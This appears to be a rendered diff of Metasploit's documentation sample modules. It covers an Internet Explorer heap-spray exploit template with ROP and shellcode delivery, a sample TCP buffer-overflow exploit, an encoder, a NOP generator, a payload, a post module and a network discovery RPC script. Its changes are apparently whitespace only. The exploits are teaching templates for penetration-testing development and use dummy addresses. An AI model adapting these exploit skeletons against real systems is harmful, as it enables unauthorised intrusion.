def cmd_aux_extra_command(*args) def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()") print_status("Running inside aux_extra_command()")
end end
end end

34
documentation/samples/modules/encoders/sample.rb
View File

@ -13,23 +13,23 @@
### ###
class Metasploit4 < Msf::Encoder class Metasploit4 < Msf::Encoder
def initialize def initialize
super( super(
'Name' => 'Sample Encoder', 'Name' => 'Sample Encoder',
'Description' => %q{ 'Description' => %q{
Sample encoder that just returns the block it's passed Sample encoder that just returns the block it's passed
when encoding occurs. when encoding occurs.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'skape', 'Author' => 'skape',
'Arch' => ARCH_ALL) 'Arch' => ARCH_ALL)
end end
# #
# Returns the unmodified buffer to the caller. # Returns the unmodified buffer to the caller.
# #
def encode_block(state, buf) def encode_block(state, buf)
buf buf
end end
end end

216
documentation/samples/modules/exploits/ie_browser.rb
View File

@ -15,133 +15,133 @@ require 'msf/core'
# #
### ###
class Metasploit4 < Msf::Exploit::Remote class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
# Set :classid and :method for ActiveX exploits. For example: # Set :classid and :method for ActiveX exploits. For example:
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}", # :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
# :method => "SetShapeNodeType", # :method => "SetShapeNodeType",
autopwn_info({ autopwn_info({
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
:ua_minver => "8.0", :ua_minver => "8.0",
:ua_maxver => "10.0", :ua_maxver => "10.0",
:javascript => true, :javascript => true,
:os_name => OperatingSystems::WINDOWS, :os_name => OperatingSystems::WINDOWS,
:rank => NormalRanking :rank => NormalRanking
}) })
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Module Name", 'Name' => "Module Name",
'Description' => %q{ 'Description' => %q{
This template covers IE8/9/10, and uses the user-agent HTTP header to detect This template covers IE8/9/10, and uses the user-agent HTTP header to detect
the browser version. Please note IE8 and newer may emulate an older IE version the browser version. Please note IE8 and newer may emulate an older IE version
in compatibility mode, in that case the module won't be able to detect the in compatibility mode, in that case the module won't be able to detect the
browser correctly. browser correctly.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ], 'Author' => [ 'sinn3r' ],
'References' => 'References' =>
[ [
[ 'URL', 'http://metasploit.com' ] [ 'URL', 'http://metasploit.com' ]
], ],
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', {} ], [ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ], [ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ] [ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
], ],
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00", # js_property_spray 'BadChars' => "\x00", # js_property_spray
'StackAdjustment' => -3500 'StackAdjustment' => -3500
}, },
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Apr 1 2013", 'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
def get_target(agent) def get_target(agent)
return target if target.name != 'Automatic' return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}" ie_name = "IE #{ie}"
case nt case nt
when '5.1' when '5.1'
os_name = 'Windows XP SP3' os_name = 'Windows XP SP3'
when '6.0' when '6.0'
os_name = 'Windows Vista' os_name = 'Windows Vista'
when '6.1' when '6.1'
os_name = 'Windows 7' os_name = 'Windows 7'
when '6.2' when '6.2'
os_name = 'Windows 8' os_name = 'Windows 8'
end end
targets.each do |t| targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t return t
end end
end end
nil nil
end end
def get_payload(t) def get_payload(t)
stack_pivot = "\x41\x42\x43\x44" stack_pivot = "\x41\x42\x43\x44"
code = payload.encoded code = payload.encoded
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
print_status("Using msvcrt ROP") print_status("Using msvcrt ROP")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else else
print_status("Using JRE ROP") print_status("Using JRE ROP")
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end end
rop_payload rop_payload
end end
def get_html(t) def get_html(t)
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch)) js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
html = %Q| html = %Q|
<script> <script>
#{js_property_spray} #{js_property_spray}
var s = unescape("#{js_p}"); var s = unescape("#{js_p}");
sprayHeap({shellcode:s}); sprayHeap({shellcode:s});
</script> </script>
| |
html.gsub(/^\t\t/, '') html.gsub(/^\t\t/, '')
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
agent = request.headers['User-Agent'] agent = request.headers['User-Agent']
print_status("Requesting: #{request.uri}") print_status("Requesting: #{request.uri}")
target = get_target(agent) target = get_target(agent)
if target.nil? if target.nil?
print_error("Browser not supported, sending 404: #{agent}") print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli) send_not_found(cli)
return return
end end
print_status("Target selected as: #{target.name}") print_status("Target selected as: #{target.name}")
html = get_html(target) html = get_html(target)
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' }) send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
end end
end end

116
documentation/samples/modules/exploits/sample.rb
View File

@ -15,71 +15,71 @@ require 'msf/core'
### ###
class Metasploit4 < Msf::Exploit::Remote class Metasploit4 < Msf::Exploit::Remote
# #
# This exploit affects TCP servers, so we use the TCP client mixin. # This exploit affects TCP servers, so we use the TCP client mixin.
# #
include Exploit::Remote::Tcp include Exploit::Remote::Tcp
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Sample Exploit', 'Name' => 'Sample Exploit',
'Description' => %q{ 'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug. in an TCP server that has a parsing bug.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => ['skape'], 'Author' => ['skape'],
'References' => 'References' =>
[ [
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 1000, 'Space' => 1000,
'BadChars' => "\x00", 'BadChars' => "\x00",
}, },
'Targets' => 'Targets' =>
[ [
# Target 0: Windows All # Target 0: Windows All
[ [
'Windows XP/Vista/7/8', 'Windows XP/Vista/7/8',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Ret' => 0x41424344 'Ret' => 0x41424344
} }
], ],
], ],
'DisclosureDate' => "Apr 1 2013", 'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
# #
# The sample exploit just indicates that the remote host is always # The sample exploit just indicates that the remote host is always
# vulnerable. # vulnerable.
# #
def check def check
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
end end
# #
# The exploit method connects to the remote service and sends 1024 random bytes # The exploit method connects to the remote service and sends 1024 random bytes
# followed by the fake return address and then the payload. # followed by the fake return address and then the payload.
# #
def exploit def exploit
connect connect
print_status("Sending #{payload.encoded.length} byte payload...") print_status("Sending #{payload.encoded.length} byte payload...")
# Build the buffer for transmission # Build the buffer for transmission
buf = rand_text_alpha(1024) buf = rand_text_alpha(1024)
buf << [ target.ret ].pack('V') buf << [ target.ret ].pack('V')
buf << payload.encoded buf << payload.encoded
# Send it off # Send it off
sock.put(buf) sock.put(buf)
sock.get_once sock.get_once
handler handler
end end
end end

28
documentation/samples/modules/nops/sample.rb
View File

@ -15,20 +15,20 @@ require 'msf/core'
### ###
class Metasploit4 < Msf::Nop class Metasploit4 < Msf::Nop
def initialize def initialize
super( super(
'Name' => 'Sample NOP Generator', 'Name' => 'Sample NOP Generator',
'Description' => 'Sample single-byte NOP generator', 'Description' => 'Sample single-byte NOP generator',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'skape', 'Author' => 'skape',
'Arch' => ARCH_X86) 'Arch' => ARCH_X86)
end end
# #
# Returns a string of 0x90's for the supplied length. # Returns a string of 0x90's for the supplied length.
# #
def generate_sled(length, opts) def generate_sled(length, opts)
"\x90" * length "\x90" * length
end end
end end

30
documentation/samples/modules/payloads/singles/sample.rb
View File

@ -14,21 +14,21 @@ require 'msf/core'
### ###
module Metasploit4 module Metasploit4
include Msf::Payload::Single include Msf::Payload::Single
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Debugger Trap', 'Name' => 'Debugger Trap',
'Description' => 'Causes a debugger trap exception through int3', 'Description' => 'Causes a debugger trap exception through int3',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'skape', 'Author' => 'skape',
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'Payload' => 'Payload' =>
{ {
'Payload' => "\xcc" 'Payload' => "\xcc"
} }
)) ))
end end
end end

38
documentation/samples/modules/post/sample.rb
View File

@ -15,26 +15,26 @@ require 'msf/core/post/common'
### ###
class Metasploit4 < Msf::Post class Metasploit4 < Msf::Post
include Msf::Post::Common include Msf::Post::Common
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'Sample Post Module', 'Name' => 'Sample Post Module',
'Description' => %q{Sample Post Module}, 'Description' => %q{Sample Post Module},
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'], 'Author' => [ 'sinn3r'],
'Platform' => [ 'win'], 'Platform' => [ 'win'],
'SessionTypes' => [ "shell", "meterpreter" ] 'SessionTypes' => [ "shell", "meterpreter" ]
)) ))
end end
# #
# This post module runs a ipconfig command and returns the output # This post module runs a ipconfig command and returns the output
# #
def run def run
print_status("Executing ipconfig on remote machine") print_status("Executing ipconfig on remote machine")
o = cmd_exec("ipconfig") o = cmd_exec("ipconfig")
print_line(o) print_line(o)
end end
end end

150
documentation/samples/pro/msfrpc_pro_discover.rb
View File

@ -5,19 +5,19 @@ require 'msfrpc-client'
require 'rex/ui' require 'rex/ui'
def usage(ropts) def usage(ropts)
$stderr.puts ropts $stderr.puts ropts
if @rpc and @rpc.token if @rpc and @rpc.token
wspaces = @rpc.call("pro.workspaces") rescue {} wspaces = @rpc.call("pro.workspaces") rescue {}
if wspaces.keys.length > 0 if wspaces.keys.length > 0
$stderr.puts "Active Projects:" $stderr.puts "Active Projects:"
wspaces.each_pair do |k,v| wspaces.each_pair do |k,v|
$stderr.puts "\t#{k}" $stderr.puts "\t#{k}"
end end
end end
end end
$stderr.puts "" $stderr.puts ""
exit(1) exit(1)
end end
opts = {} opts = {}
@ -27,88 +27,88 @@ parser = Msf::RPC::Client.option_parser(opts)
parser.separator('Discover Mandatory Options:') parser.separator('Discover Mandatory Options:')
parser.on("--project PROJECT") do |x| parser.on("--project PROJECT") do |x|
opts[:project] = x opts[:project] = x
end end
parser.on("--targets TARGETS") do |x| parser.on("--targets TARGETS") do |x|
opts[:targets] = [x] opts[:targets] = [x]
end end
parser.on("--blacklist BLACKLIST (optional)") do |x| parser.on("--blacklist BLACKLIST (optional)") do |x|
opts[:blacklist] = x opts[:blacklist] = x
end end
parser.on("--speed SPEED (optional)") do |x| parser.on("--speed SPEED (optional)") do |x|
opts[:speed] = x opts[:speed] = x
end end
parser.on("--extra-ports PORTS (optional)") do |x| parser.on("--extra-ports PORTS (optional)") do |x|
opts[:extra_ports] = x opts[:extra_ports] = x
end end
parser.on("--blacklist-ports PORTS (optional)") do |x| parser.on("--blacklist-ports PORTS (optional)") do |x|
opts[:blacklist_ports] = x opts[:blacklist_ports] = x
end end
parser.on("--custom-ports PORTS (optional)") do |x| parser.on("--custom-ports PORTS (optional)") do |x|
opts[:custom_ports] = x opts[:custom_ports] = x
end end
parser.on("--portscan-timeout TIMEOUT (optional)") do |x| parser.on("--portscan-timeout TIMEOUT (optional)") do |x|
opts[:portscan_timeout] = x opts[:portscan_timeout] = x
end end
parser.on("--source-port PORT (optional)") do |x| parser.on("--source-port PORT (optional)") do |x|
opts[:source_port] = x opts[:source_port] = x
end end
parser.on("--custom-nmap-options OPTIONS (optional)") do |x| parser.on("--custom-nmap-options OPTIONS (optional)") do |x|
opts[:custom_nmap_options] = x opts[:custom_nmap_options] = x
end end
parser.on("--disable-udp-probes (optional)") do parser.on("--disable-udp-probes (optional)") do
opts[:disable_udp_probes] = true opts[:disable_udp_probes] = true
end end
parser.on("--disable-finger-users (optional)") do parser.on("--disable-finger-users (optional)") do
opts[:disable_finger_users] = true opts[:disable_finger_users] = true
end end
parser.on("--disable-snmp-scan (optional)") do parser.on("--disable-snmp-scan (optional)") do
opts[:disable_snmp_scan] = true opts[:disable_snmp_scan] = true
end end
parser.on("--disable-service-identification (optional)") do parser.on("--disable-service-identification (optional)") do
opts[:disable_service_identification] = true opts[:disable_service_identification] = true
end end
parser.on("--smb-user USER (optional)") do |x| parser.on("--smb-user USER (optional)") do |x|
opts[:smb_user] = x opts[:smb_user] = x
end end
parser.on("--smb-pass PASS (optional)") do |x| parser.on("--smb-pass PASS (optional)") do |x|
opts[:smb_pass] = x opts[:smb_pass] = x
end end
parser.on("--smb-domain DOMAIN (optional)") do |x| parser.on("--smb-domain DOMAIN (optional)") do |x|
opts[:smb_domain] = x opts[:smb_domain] = x
end end
parser.on("--dry-run (optional)") do parser.on("--dry-run (optional)") do
opts[:dry_run] = true opts[:dry_run] = true
end end
parser.on("--single-scan (optional)") do parser.on("--single-scan (optional)") do
opts[:single_scan] = true opts[:single_scan] = true
end end
parser.on("--fast-detect (optional)") do parser.on("--fast-detect (optional)") do
opts[:fast_detect] = true opts[:fast_detect] = true
end end
parser.on("--help") do parser.on("--help") do
$stderr.puts parser $stderr.puts parser
exit(1) exit(1)
end end
parser.separator('') parser.separator('')
@ -117,9 +117,9 @@ parser.parse!(ARGV)
@rpc = Msf::RPC::Client.new(opts) @rpc = Msf::RPC::Client.new(opts)
if not @rpc.token if not @rpc.token
$stderr.puts "Error: Invalid RPC server options specified" $stderr.puts "Error: Invalid RPC server options specified"
$stderr.puts parser $stderr.puts parser
exit(1) exit(1)
end end
# Provide default values for certain options - If there's no alternative set # Provide default values for certain options - If there's no alternative set
@ -149,59 +149,59 @@ user = @rpc.call("pro.default_admin_user")['username']
# Create the task object with all options # Create the task object with all options
task = @rpc.call("pro.start_discover", { task = @rpc.call("pro.start_discover", {
'workspace' => project, 'workspace' => project,
'username' => user, 'username' => user,
'ips' => targets, 'ips' => targets,
'DS_BLACKLIST_HOSTS' => blacklist, 'DS_BLACKLIST_HOSTS' => blacklist,
'DS_PORTSCAN_SPEED' => speed, 'DS_PORTSCAN_SPEED' => speed,
'DS_PORTS_EXTRA' => extra_ports, 'DS_PORTS_EXTRA' => extra_ports,
'DS_PORTS_BLACKLIST' => blacklist_ports, 'DS_PORTS_BLACKLIST' => blacklist_ports,
'DS_PORTS_CUSTOM' => custom_ports, 'DS_PORTS_CUSTOM' => custom_ports,
'DS_PORTSCAN_TIMEOUT' => portscan_timeout, 'DS_PORTSCAN_TIMEOUT' => portscan_timeout,
'DS_PORTSCAN_SOURCE_PORT' => source_port, 'DS_PORTSCAN_SOURCE_PORT' => source_port,
'DS_CustomNmap' => custom_nmap_options, 'DS_CustomNmap' => custom_nmap_options,
'DS_UDP_PROBES' => disable_udp_probes, 'DS_UDP_PROBES' => disable_udp_probes,
'DS_FINGER_USERS' => disable_finger_users, 'DS_FINGER_USERS' => disable_finger_users,
'DS_SNMP_SCAN' => disable_snmp_scan, 'DS_SNMP_SCAN' => disable_snmp_scan,
'DS_IDENTIFY_SERVICES' => disable_service_identification, 'DS_IDENTIFY_SERVICES' => disable_service_identification,
'DS_SMBUser' => smb_user, 'DS_SMBUser' => smb_user,
'DS_SMBPass' => smb_pass, 'DS_SMBPass' => smb_pass,
'DS_SMBDomain' => smb_domain, 'DS_SMBDomain' => smb_domain,
'DS_SINGLE_SCAN' => single_scan, 'DS_SINGLE_SCAN' => single_scan,
'DS_FAST_DETECT' => fast_detect 'DS_FAST_DETECT' => fast_detect
}) })
puts "DEBUG: Running task with #{task.inspect}" puts "DEBUG: Running task with #{task.inspect}"
if not task['task_id'] if not task['task_id']
$stderr.puts "[-] Error starting the task: #{task.inspect}" $stderr.puts "[-] Error starting the task: #{task.inspect}"
exit(0) exit(0)
end end
puts "[*] Creating Task ID #{task['task_id']}..." puts "[*] Creating Task ID #{task['task_id']}..."
while true while true
select(nil, nil, nil, 0.50) select(nil, nil, nil, 0.50)
stat = @rpc.call("pro.task_status", task['task_id']) stat = @rpc.call("pro.task_status", task['task_id'])
if stat['status'] == 'invalid' if stat['status'] == 'invalid'
$stderr.puts "[-] Error checking task status" $stderr.puts "[-] Error checking task status"
exit(0) exit(0)
end end
info = stat[ task['task_id'] ] info = stat[ task['task_id'] ]
if not info if not info
$stderr.puts "[-] Error finding the task" $stderr.puts "[-] Error finding the task"
exit(0) exit(0)
end end
if info['status'] == "error" if info['status'] == "error"
$stderr.puts "[-] Error generating report: #{info['error']}" $stderr.puts "[-] Error generating report: #{info['error']}"
exit(0) exit(0)
end end
break if info['progress'] == 100 break if info['progress'] == 100
end end
$stdout.puts "[+] Task Complete!" $stdout.puts "[+] Task Complete!"

Some files were not shown because too many files have changed in this diff Show More